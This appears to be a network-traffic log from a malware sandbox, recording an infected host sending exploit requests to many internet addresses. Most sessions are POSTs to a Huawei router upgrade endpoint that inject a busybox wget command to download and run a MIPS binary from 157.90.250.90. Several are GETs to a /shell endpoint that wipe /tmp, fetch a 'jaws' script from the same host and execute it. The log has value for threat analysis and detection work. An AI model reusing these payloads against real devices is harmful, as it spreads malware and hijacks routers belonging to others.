                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    103192.168.2.233394241.243.122.20937215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:54.900047064 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    104192.168.2.2358152156.177.86.19537215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:54.900126934 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    105192.168.2.2353180156.1.156.16137215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:54.900208950 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    106192.168.2.233988441.223.100.16437215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:54.900299072 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    107192.168.2.2358952197.213.172.17437215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:54.900384903 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    108192.168.2.234524041.34.236.13237215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:54.900454998 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    109192.168.2.234165641.204.44.5137215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:54.900546074 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    110192.168.2.2360102156.199.249.20937215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:54.900599003 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    111192.168.2.2332814219.81.41.17380
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:55.013360023 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    112192.168.2.2352416140.3.1.8280
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:55.013398886 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    113192.168.2.2341106197.32.245.13637215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:55.026185989 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    114192.168.2.2348142152.212.240.18880
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:55.258346081 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
